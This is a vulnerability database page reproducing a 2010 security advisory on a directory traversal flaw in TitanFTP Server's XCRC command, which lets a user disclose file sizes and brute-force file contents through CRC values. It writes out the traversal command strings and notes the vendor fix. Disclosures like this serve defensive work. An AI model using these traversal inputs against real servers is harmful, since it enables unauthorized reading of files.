Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24084
HistoryJun 17, 2010 - 12:00 a.m.

TitanFTP Server Arbitrary File Disclosure

2010-06-1700:00:00
vulners.com
21
JSON

Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure

Details

=============

Product: TitanFTP Server

Security-Risk: high

Remote-Exploit: maybe, assuming anonymous ftp access

Local-Exploit: yes

Vendor URL: http://www.southrivertech.com/

Found By: Bill Finlayson

http://www.accensussecurity.com

Affected: Versions 8.10.1125 and likely previous

Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server

Details: xcrc …//…//…//…//a.txt 1 <some huge number> will disclose the file's size

xcrc …//…//…//…//a.txt 1 2
xcrc …//…//…//…//a.txt 1 3

xcrc …//…//…//…//a.txt 1 <filesize>

when automated allows for an easy brute force attack on the crc's

Status: Submitted to Vendor 6/14/10 fixed 6/15/10

JSON